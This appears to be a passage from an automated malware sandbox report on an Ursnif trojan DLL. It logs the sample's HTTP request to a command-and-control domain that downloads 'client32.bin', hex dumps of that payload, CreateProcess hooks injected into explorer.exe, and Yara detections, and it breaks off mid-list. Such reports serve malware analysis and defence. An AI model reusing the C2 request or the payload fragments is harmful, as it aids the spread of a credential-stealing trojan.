Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49831	193.29.104.83	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 04:46:14 UTC	495	OUT	GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: xereunrtol.website
2021-10-08 04:46:14 UTC	496	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 08 Oct 2021 04:46:14 GMT Content-Type: application/zip Content-Length: 218248 Connection: close X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=bnb8bbjh246g8ah1kt3ji1eou1; path=/; domain=.xereunrtol.website Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:14 GMT; path=/ Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
2021-10-08 04:46:14 UTC	496	IN	Data Raw: 6c bd b1 55 78 3c 2f 83 96 64 28 5e 83 05 8a 9a 59 e6 8f 32 73 cc 25 de a8 df 45 46 5c 2d 0d b3 28 f4 8d 45 6b 12 58 97 d6 53 d0 b5 93 3f 2a 25 51 dc 23 ad 8b 05 f8 ab 94 02 fa c9 22 c7 8b 6e 75 10 d0 56 0b 1c b5 f9 0b a6 ec 6b c5 b4 0f 8c 2d 83 76 7b aa 47 60 e4 db 6d 87 2e 5f 50 3b e9 f5 82 a0 64 79 2f 8c c6 06 e8 e3 05 8f 00 27 8d f9 e7 63 00 f9 00 cd d7 22 84 c8 9e 1e 70 22 68 90 cd f2 a8 2a c3 66 b0 42 d8 df 29 ad cc 8b 27 d7 d2 75 b1 a2 d4 b6 de c2 f5 34 34 0e 8f e7 70 fb 01 16 88 11 90 33 ba 4b b0 87 5b ef 8e ce 71 3b fd 3e b4 43 79 ca 65 0f a6 03 cc 96 72 a8 96 ad ea 48 bc f5 23 36 9b d2 29 17 53 15 a2 b3 86 9f 7a 2b c0 b0 17 7b 86 5f 95 f6 d5 68 af de b9 ca df 3d 44 80 fc 23 4d c2 0a df 43 93 eb 3c 74 46 5a 69 3f 1a ff 44 2b fc f1 44 b6 c5 74 04 Data Ascii: lUx</d(^Y2s%EF\-(EkXS?%Q#"nuVk-v{G`m._P;dy/'c"p"hfB)'u44p3K[q;>CyerH#6)Sz+{_h=D#MC<tFZi?D+Dt
2021-10-08 04:46:14 UTC	512	IN	Data Raw: f1 d4 9c 97 55 af 90 29 bf 8c e4 69 c1 ab fa cb 06 10 d5 ec 65 1a a7 0c 19 b7 40 1d d1 bc 6f b0 66 ff 30 1f 25 92 a6 64 35 98 a1 26 af fc 75 67 99 70 a1 60 51 cd 1b 54 2b 6d 6a c8 83 2d 89 d5 53 98 20 7a 25 e6 83 9c 2a 3c 7d 8a 64 89 1b 65 da 37 58 4c dd 44 6a e3 16 a4 cc 55 64 8e 44 aa 77 c2 83 20 40 2c ab e7 0e c8 98 ba 9d 6b db 1e c9 01 8b 7b d0 52 ca a2 1a 0d 17 12 34 6f 17 a8 eb ed 86 5a d2 08 a1 19 29 03 07 41 8b c7 0f dd bd 27 58 47 83 22 37 36 2b 76 53 2f 99 6a ff 4d e8 31 0d 63 af 07 2b ed 46 cf 2c db 31 6a 93 01 aa 4b 64 5d 55 86 5f 6f fb b3 32 9a 04 02 e7 86 5e 77 2d 07 4d fc e3 e5 7e da 69 f8 b1 32 54 53 a3 18 7a 48 69 ed 81 33 a8 79 12 7a 09 12 78 e5 76 10 cc 53 e4 a9 c3 24 7f a6 96 81 b9 79 35 41 38 37 2f f0 e0 b8 bf a5 2d 57 da 67 5c 0b 0a Data Ascii: U)ie@of0%d5&ugp`QT+mj-S z%*<}de7XLDjUdDw @,k{R4oZ)A'XG"76+vS/jM1c+F,1jKd]U_o2^w-M~i2TSzHi3yzxvS$y5A87/-Wg\
2021-10-08 04:46:15 UTC	528	IN	Data Raw: 14 3a 58 80 b0 f3 f1 85 ac fc 89 28 3c a1 12 4c da 29 0c fa 3e 6d ca 3a 56 69 fd 46 23 f8 5a c7 3a 95 c4 1b 98 74 1a 52 64 e2 3a af 22 f4 54 11 2f 8a 95 98 62 19 52 8b bc bc 2f 9e 6c d8 73 6e 0b 59 17 b5 52 25 14 bb cb ca 95 71 9b 03 e9 df f6 f4 6a 58 57 8f f9 67 89 73 8e 61 c5 2b 7f ab ad c1 6e 29 d7 cd 6a 97 7e 99 f5 2b 5e 78 76 be 07 23 ad 56 41 88 6e 78 cb 39 f6 f1 67 1c c8 c4 1d ed d8 3e 90 89 d6 b5 32 ac d6 c1 9e fc 9b 24 67 12 e4 52 58 fe 61 1a e6 97 da 2e 97 19 31 e7 77 3e e2 e4 84 b3 74 0f d8 da 13 8d 58 a1 7b ad d4 d0 f7 cb d5 b5 66 df 61 c5 73 b3 f8 6b 52 de f9 29 43 cc e9 a3 fe e5 d0 b4 1b 59 b8 f9 ff 64 72 ea 30 b6 54 34 fd b7 3b 41 ea 93 0a 6c 20 5d fc a3 a4 8e 7a ed 49 9f 35 53 6c 32 78 60 d3 eb 51 c9 e3 24 b1 d9 84 72 75 53 49 1f f6 a5 df Data Ascii: :X(<L)>m:ViF#Z:tRd:"T/bR/lsnYR%qjXWgsa+n)j~+^xv#VAnx9g>2$gRXa.1w>tX{faskR)CYdr0T4;Al ]zI5Sl2x`Q$ruSI
2021-10-08 04:46:15 UTC	544	IN	Data Raw: c5 4d 3e e5 79 2a 49 f1 21 29 bc f5 ca 6c 1b 6e 17 d0 15 87 41 f6 e3 b2 3a c7 3a 77 9e 19 d7 2b 4b 4e dd bd 50 19 44 f3 b6 27 44 02 38 61 ca 43 9c ad ef 98 47 21 d0 af a5 4a 43 20 ef fe 99 4e 92 32 d4 df 07 cc 27 84 ec 71 fd 0f 80 e1 6a 65 0f 7a cd aa c7 12 57 71 f3 45 7f a1 47 5a fc 04 aa 9f 99 77 ec 2b 1a c7 d3 89 fc 63 11 07 e2 04 0f 4d fb f1 7e 9e 64 fa 3c fd d8 1c 4e d3 e4 ad f8 a8 4e 4c 19 a9 5e 8b ae f8 76 ff 0c 0e ec dc c5 14 23 6b f9 c1 26 14 3a 36 f5 c2 9e 2d aa e9 9c 35 29 f0 04 cc e4 a4 86 4c 80 89 47 88 b0 77 62 9d 98 9a b9 ee b0 2f 22 f1 23 9e e2 fe 27 e1 f1 24 2c 87 76 9b 8a 93 70 cc 1f 2d a6 4e 79 fa 03 cc f2 b3 fa 2e 6a 27 c5 44 15 0d 39 63 40 a4 9e b5 65 37 b4 54 c8 a0 64 93 82 db 91 5f 6c e5 ce 0a b5 06 3f 12 64 c6 f4 78 ef 87 7d 6f d1 Data Ascii: M>y*I!)lnA::w+KNPD'D8aCG!JC N2'qjezWqEGZw+cM~d<NNL^v#k&:6-5)LGwb/"#'$,vp-Ny.j'D9c@e7Td_l?dx}o
2021-10-08 04:46:15 UTC	560	IN	Data Raw: fc 13 c6 c7 bb 87 62 3d 39 6a 86 ad a2 35 99 35 9a bf 78 f4 aa 74 d6 a9 52 0e b5 c2 e7 c6 22 99 23 c1 e6 fb b7 38 55 6c da 7c a3 27 14 75 63 00 9d e2 ec 4b ab cd 20 53 07 ee 46 1b 6a 0f b7 20 46 d2 ec 56 db 3c 50 5e 6e 05 e7 19 f7 1b 09 c4 fa 9e 2d 53 9e 55 b8 73 12 85 33 37 e1 9a d5 63 da 31 65 7f d7 21 38 cc 3a 1e a7 88 41 03 89 3a 7d b0 4b aa 65 23 42 67 fc 0e d3 57 4d e7 b0 1f 07 19 8e 93 c2 d9 48 3d 71 fd 42 ad 71 be f7 2d b0 83 23 83 be 0c 8d a2 c1 c0 8d 19 15 1e 87 41 bc 89 eb 47 61 34 98 58 61 00 af 5a 43 95 8a 4f 3e 27 f8 ee 12 2e 60 93 d2 d4 25 4a c6 cd b6 2c d1 b4 fd 13 89 da e1 16 d9 23 b1 2e dc 25 26 97 99 ce b7 99 ca dc 11 ec ac 46 6e 30 46 b9 d9 65 85 07 79 c2 b3 53 68 8d 6d 50 c9 98 b5 65 d4 29 bb b1 e7 96 e5 bb 7e d3 e4 87 2c 1a ff c7 d9 Data Ascii: b=9j55xtR"#8Ul\|'ucK SFj FV<P^n-SUs37c1e!8:A:}Ke#BgWMH=qBq-#AGa4XaZCO>'.`%J,#.%&Fn0FeyShmPe)~,
2021-10-08 04:46:15 UTC	576	IN	Data Raw: d5 99 ba 9a e1 5a 81 5a 6e 5d 3c 24 b2 ca c7 57 6d 0c c5 b2 07 3d 9c a9 6f fc 32 27 c5 33 b4 88 06 4f 2e 37 4d e9 d4 a0 95 b8 df dc 9a c0 75 a1 0a b5 ac d6 4b 05 94 8e 54 b2 82 7d 5a 49 4e 1b 2e 6c 31 7f 43 72 d2 e4 2d 66 be a2 dc ac 23 94 3b 7f 0b c0 7f 90 da 3b 1b fc 5d 71 a1 b8 44 82 4b c3 ff 74 fa 84 29 57 1f df 5f 56 65 cd 8f f4 3d 8d b3 fa 62 e9 2d f2 dc 10 e7 47 54 30 3d 18 75 e2 25 94 a0 af 41 a4 d2 12 ea 6c f3 12 33 12 9e 62 58 39 19 0a 45 0d 6f 7f 5e 58 38 7d 93 bd 5f 1a d2 33 58 b2 1d 55 d1 d7 55 13 14 89 ff 7e d7 c0 a7 b4 69 bf 50 0b d6 7d ad 21 97 ff 36 25 8f f2 bd 0c a3 3f 7f 12 65 3d 0d 46 ae 1a fd ff 89 ed 06 be a8 45 c9 16 51 4f 7e 3b 08 5f 8b 65 03 34 90 5b 91 ac 97 a4 7b 87 87 7c af 85 c5 65 5f cb 49 9b 86 cc 18 33 a6 3d 59 23 ac 30 68 Data Ascii: ZZn]<$Wm=o2'3O.7MuKT}ZIN.l1Cr-f#;;]qDKt)W_Ve=b-GT0=u%Al3bX9Eo^X8}_3XUU~iP}!6%?e=FEQO~;_e4[{\|e_I3=Y#0h
2021-10-08 04:46:15 UTC	592	IN	Data Raw: 17 22 e8 fd bf 96 c2 79 44 f9 1f 50 23 f8 33 be 7f 7b df 10 9b 5e 9a 76 c7 0a 4c 83 be ec 3c ed 9e eb e0 58 b1 7a 5e 32 12 a4 e2 ad 7e 98 8d f3 70 62 e9 6d b5 20 ce a6 d2 d1 52 c7 e2 95 0a 97 02 50 5b 3e c5 62 84 05 a8 3f 20 ff b5 f3 ef 24 40 0c 6d 9e 44 af 31 97 8b b2 e5 37 c3 51 65 ee 8b 3c 98 3e b0 25 79 26 6c 21 19 b9 1c 95 65 33 17 58 b2 f0 57 50 2d aa 92 16 5d 35 30 43 ac 04 1a a2 e8 9b 3e 08 df 29 f1 75 f9 96 f0 17 3b 4b 88 0f 33 87 f0 71 4e b1 d4 43 58 cf 25 5e d1 7b 81 64 0b 08 df 3a 91 16 da ba 35 ed 45 f9 8e 09 63 eb b1 08 9e 62 20 33 97 d3 cc fb 58 a6 58 c5 52 68 c5 c7 c7 1a bc 77 db 0b 7f 25 26 92 5e 0a fb 02 94 b1 e3 bd 03 85 d9 df 07 32 29 a3 da 9c 12 1e 10 0b c1 65 c4 25 24 86 ff 8b 7b 0c c9 48 f8 c2 e0 b3 63 72 ea 47 7b 88 59 68 10 ff a4 Data Ascii: "yDP#3{^vL<Xz^2~pbm RP[>b? $@mD17Qe<>%y&l!e3XWP-]50C>)u;K3qNCX%^{d:5Ecb 3XXRhw%&^2)e%${HcrG{Yh
2021-10-08 04:46:15 UTC	608	IN	Data Raw: 36 1e 66 36 e9 ab 62 53 c6 24 e8 cf 14 7d de 3a fc 16 27 d6 4e 15 b5 49 b6 8e f8 ac 23 51 1e 9f f4 38 0b 0a 9d 4d 0a 49 d7 25 29 2b 6f 52 97 ff 99 ac 29 76 72 d5 00 86 62 3f fc 0f 1d 9d 8b 1e 11 67 0d 8e 2f 13 a5 06 c9 6f 51 4b ca ab 20 46 48 e8 69 68 59 1d 34 f2 2e 4e 19 af de c1 8c 99 4a 58 6e bc 27 86 08 5c 26 a9 c5 16 59 ab dc 1e 01 ea f1 cf b8 46 a6 4b a6 70 fb c5 f3 03 0c 88 cb 75 fc ed 70 4e 7a de d8 79 44 c2 1f 42 35 53 ae 6a cd 98 74 82 a0 9b e9 d1 94 ec 28 5e cd 81 ac 3d a6 f9 72 0b 3c 9d 14 c3 93 8f 73 fd b1 35 34 65 9e 7f e1 4c dd 03 71 67 1e 40 9a ae 47 fa 54 c3 45 56 4a 64 c9 a4 34 4c 53 e4 c3 35 ae 23 e4 4c 98 58 09 c6 71 a7 22 8d 55 15 e4 88 ab f3 7f 9e b2 12 e3 b9 3c 04 6a 8c ad 89 4d 87 d0 a6 2f 1e c9 db be c2 d6 3d 76 43 6c 53 34 2a 5b Data Ascii: 6f6bS$}:'NI#Q8MI%)+oR)vrb?g/oQK FHihY4.NJXn'\&YFKpupNzyDB5Sjt(^=r<s54eLqg@GTEVJd4LS5#LXq"U<jM/=vClS4*[
2021-10-08 04:46:15 UTC	624	IN	Data Raw: a9 12 1c d4 6d b4 8a cd a0 43 40 81 23 c3 00 96 7f 96 0b ca b5 d0 90 0b 95 0f 87 a6 01 6d 95 aa 34 88 ee 7a e3 5f 9f 2a 3a e3 97 c9 1f da 68 ab ea 30 70 d8 c2 8c 3e df 77 9d 5a b9 89 e8 75 21 26 a8 58 98 b2 cb 60 0c 02 dc 8f 06 a6 6d cb 5b 2c df de d4 7c 99 16 e4 a8 b3 3d 4b 6b 85 a1 79 c7 e0 53 2e 2d 36 b2 7f 56 1b 33 85 5a e3 c4 08 c7 2f fd 21 58 dc 54 00 e6 db c2 17 be 88 c1 1a db da 96 49 1d 23 e3 20 94 8b 0a 77 a9 8c aa bf 61 f0 67 56 bf 1b 5c 31 25 72 8f c2 1d 59 e5 48 30 a1 8e b8 d4 73 67 65 33 f2 a5 b6 15 7a 47 ed 5d f2 78 26 07 9c d1 8a f4 fb e2 6b f1 a9 1a 21 3d 23 d7 02 20 dd c0 fb 41 14 aa 66 b1 d5 b0 45 c1 3c 5c 17 35 63 60 dc c1 dc 25 b8 b5 8a fb 05 27 52 f9 ec 1e 22 7b e6 ec 32 de e7 58 d2 31 c5 13 61 5a c3 ea ee af 7e 00 fd 67 34 03 22 68 Data Ascii: mC@#m4z_*:h0p>wZu!&X`m[,\|=KkyS.-6V3Z/!XTI# wagV\1%rYH0sge3zG]x&k!=# AfE<\5c`%'R"{2X1aZ~g4"h
2021-10-08 04:46:15 UTC	640	IN	Data Raw: 02 5f 02 fe 23 fd 84 cf 58 65 bf 0f 62 e6 87 5c 2d cd e0 bc 62 71 af 8e 50 c9 f9 27 ee 56 ac 5e d9 ef 29 65 92 52 50 54 ae 31 0c b3 87 2d 56 ad a4 ba 2b fd 8c e1 ec 2c 71 e7 93 44 bc 7f 37 19 79 1b aa 3a 39 ae ba 2d ce a1 b7 d7 40 e1 64 e8 99 76 54 ea 94 50 a9 05 76 e0 db 0f 6d ac 49 8c e3 b0 75 7a 4e 2f eb 95 be e7 07 aa ab 31 7b e0 d8 e3 3c df 38 81 94 11 eb cc 79 9a 43 f2 3e 2c 0c 5b 14 e5 f1 75 d3 05 de 4e a6 a0 54 6b 99 00 22 2b 9b 55 7b 75 c0 7a c6 45 9b 15 33 41 e0 16 b6 cc fc 71 75 07 67 6c 20 ca b2 61 28 7d 58 cc 58 10 0c 50 c3 b5 17 aa d7 40 ec 21 fe 0b 5c 52 de b9 73 c0 1c 4f 2b 99 f1 d6 22 2e 5a 29 e0 08 b4 bb 7d 27 3b 97 ee 15 51 92 34 2e 7c 61 62 75 b9 a2 d4 d8 f1 96 6d 8a c9 8d 22 2e c9 2f 8d 8e fa b7 04 8f 81 f6 42 45 ce 9f 06 1e a2 c4 ca Data Ascii: _#Xeb\-bqP'V^)eRPT1-V+,qD7y:9-@dvTPvmIuzN/1{<8yC>,[uNTk"+U{uzE3Aqugl a(}XXP@!\RsO+".Z)}';Q4.\|abum"./BE
2021-10-08 04:46:15 UTC	656	IN	Data Raw: 17 76 76 00 8e 69 e7 50 e7 2a aa 8b 13 8d 95 a3 bc 99 e7 2e bb 2d 9d d5 59 97 81 31 a3 ab 1b a8 b4 04 f4 9a d7 df 21 73 99 c5 a1 89 df 8f 0b 47 67 31 06 f5 b9 c4 18 57 5e 75 07 ab bb da 95 73 92 99 f6 f0 2f bd 9f c9 58 76 f4 1f d7 af c6 c6 e2 a4 7e e6 bf 32 96 a7 19 7f 94 76 3b ef 5d 01 59 c6 a4 6a ce d6 87 dc a8 65 19 ae 7c a1 34 bf ab 60 e3 dc 57 bd 34 21 d5 ed 6e 39 19 9d 0c e7 0f b1 5d 32 61 2b 3d 54 04 a8 d0 33 68 eb 34 4e 8a 91 22 f5 ce 28 4c be fc 1d a3 7e 54 cd 94 7d fe 9c 61 36 f6 59 8b d8 1f ef 19 a5 27 72 1f 65 89 a5 58 7e 10 47 2d 2b 82 4b 0f ff b0 1c 7e 28 b6 2d de 32 08 f9 39 c7 5d 3b f0 18 a8 ca d4 ef aa f9 6d cb e8 9b 94 d9 9f a2 5a f1 fd 8c ed 3b 72 01 33 3f b1 d9 90 be 32 0e 9b 0b 12 55 46 e4 d3 b6 d6 5f 0d 24 88 8c 14 3b 02 fe 44 e9 b8 Data Ascii: vviP*.-Y1!sGg1W^us/Xv~2v;]Yje\|4`W4!n9]2a+=T3h4N"(L~T}a6Y'reX~G-+K~(-29];mZ;r3?2UF_$;D
2021-10-08 04:46:15 UTC	672	IN	Data Raw: b2 75 c2 d9 30 e3 9c a9 d2 44 ce a8 c3 51 b7 4f 11 e2 fe d9 e3 85 36 ea d2 35 54 58 04 5b f2 87 6e 9b 60 78 c0 bd bd 43 75 d4 c0 9f 9e cc 1e e5 28 10 c3 a3 c7 74 20 28 47 3c 59 6d 62 e2 5a 9b c0 c9 88 ac 31 bb 82 01 23 d8 f5 8c c0 55 a2 cc 56 cc 2b 88 6d 1d a2 85 76 de 24 4b 06 c4 00 c5 f6 d2 f9 3c 03 8e 7a d7 fc c7 e1 82 0f b6 32 9a e1 08 02 8d 7c 0b 26 da 60 b9 b2 fc df db 60 a9 a5 ed 9c b7 16 cc 43 95 e7 60 59 53 21 09 0b 50 41 31 9e fa cf 17 ff 31 0c 55 30 e4 b1 ac a4 16 68 a1 17 da e3 65 54 89 ec 18 8f 34 21 84 01 bf f4 67 42 fc 3b 3b 91 22 de c3 c4 b3 87 48 be 4f 28 de 3a 9e f0 af bc dc 8d 71 7f bd 77 25 4e 7f b3 82 e0 70 4b d1 36 2f b0 d9 4a c1 60 38 f5 6d 25 a0 d6 94 aa e9 2b 7c d2 0f e1 16 d6 bd 3c 70 e2 18 b1 68 ac c4 49 68 c6 7e ba f8 df 6c 10 Data Ascii: u0DQO65TX[n`xCu(t (G<YmbZ1#UV+mv$K<z2\|&``C`YS!PA11U0heT4!gB;;"HO(:qw%NpK6/J`8m%+\|<phIh~l
2021-10-08 04:46:15 UTC	688	IN	Data Raw: 03 f1 9b 10 f9 29 8a 21 a9 a1 75 75 26 bc 31 a8 bb 40 7a 68 50 e3 3e 48 98 94 f7 3c 63 84 f4 57 ce 30 80 be d8 c0 66 7a 9f fb 05 9b 9c 39 58 15 95 67 db ba e8 30 57 5b ca 96 8a 57 66 8a ce 65 8a 92 98 86 f5 2f 4e ba 5f 83 72 1c c4 32 79 6d 36 fb 48 63 17 45 e5 93 42 d7 c5 1e c6 b1 5b 96 4c b5 71 59 2a ba 97 db 47 8b e3 4b b0 ac f9 fa 8b 2f d5 28 58 9d 68 fd 17 42 3b b2 31 ee eb 37 96 16 59 a7 ac 8e 85 28 3e 5c 7e 38 b3 8d 68 e2 39 48 ba b4 33 f1 57 28 81 14 9b 63 42 f2 5f 9c f5 0b 04 0e fe 35 92 9c df 8e be 6a f2 b8 31 6f a7 c9 3c 36 9b 78 c3 00 f9 b1 14 42 98 ac 43 6f 33 0a 49 4e be dc 14 c2 f2 90 c2 f6 2c bd df 3c 60 6d 83 f6 f4 48 b7 de 18 db 77 da 76 48 3c 8c 59 6e 09 56 ff a6 6d 8c 3e 10 71 40 33 2e af 21 e5 21 55 27 c1 c7 29 47 26 0f 56 bc 14 01 04 Data Ascii: )!uu&1@zhP>H<cW0fz9Xg0W[Wfe/N_r2ym6HcEB[LqY*GK/(XhB;17Y(>\~8h9H3W(cB_5j1o<6xBCo3IN,<`mHwvH<YnVm>q@3.!!U')G&V
2021-10-08 04:46:15 UTC	704	IN	Data Raw: 68 fc a2 2c 62 69 17 7e 64 30 53 66 82 12 65 25 31 80 13 2b 5e ed 93 06 79 a1 a8 4f c7 53 f6 97 fc 5f ed 47 e6 90 a0 1c b1 63 b0 2e e7 f3 dd 5b af 67 3b 85 db 3b d9 62 eb ad cb dc 8d 79 ab 80 67 75 0a d0 6d 60 db db ec 93 a1 0c 52 f3 95 1e 80 f1 06 9f 67 8f d0 16 41 52 3c bd 08 1c e5 fc 2f d4 d6 bd f1 70 18 8e 94 9b ac 2d 44 3f a9 e3 b6 8f c5 26 ad 49 d4 92 31 91 b8 f1 a4 31 10 e9 13 f5 b0 8d fc de e1 4d 57 0b 40 46 5a 23 00 ed 5d 80 54 3a 4b 4e c7 9c 21 c9 cc 4a 32 7d ad 60 76 16 0b 72 bc 62 27 e5 15 a4 fd 3e 58 57 11 0d fd 9f a7 fa a4 d6 de d6 f5 7b 21 54 df 08 ff b9 f5 9a 4e ec 3b 54 16 f0 7d 22 05 e0 b2 d1 a6 91 8d 59 4f 94 09 95 4e b5 02 91 e0 57 80 6c 74 8f 2a 5d 43 64 e6 44 d0 58 72 37 e6 54 f2 43 e9 5b 84 3b 01 16 df 5e f1 f0 b5 62 8d 94 7d 87 0b Data Ascii: h,bi~d0Sfe%1+^yOS_Gc.[g;;bygum`RgAR</p-D?&I11MW@FZ#]T:KN!J2}`vrb'>XW{!TN;T}"YONWlt*]CdDXr7TC[;^b}

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFC8BAF521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFC8BAF5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFC8BAF520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFC8BAF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	6640E2C

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFC8BAF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	6640E2C

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6424 Parent PID: 1140

General

Start time:	06:43:32
Start date:	08/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Imagebase:	0xdd0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6392 Parent PID: 6424

General

Start time:	06:43:33
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6400 Parent PID: 6424

General

Start time:	06:43:33
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
Imagebase:	0xab0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6388 Parent PID: 6392

General

Start time:	06:43:33
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
Imagebase:	0xab0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 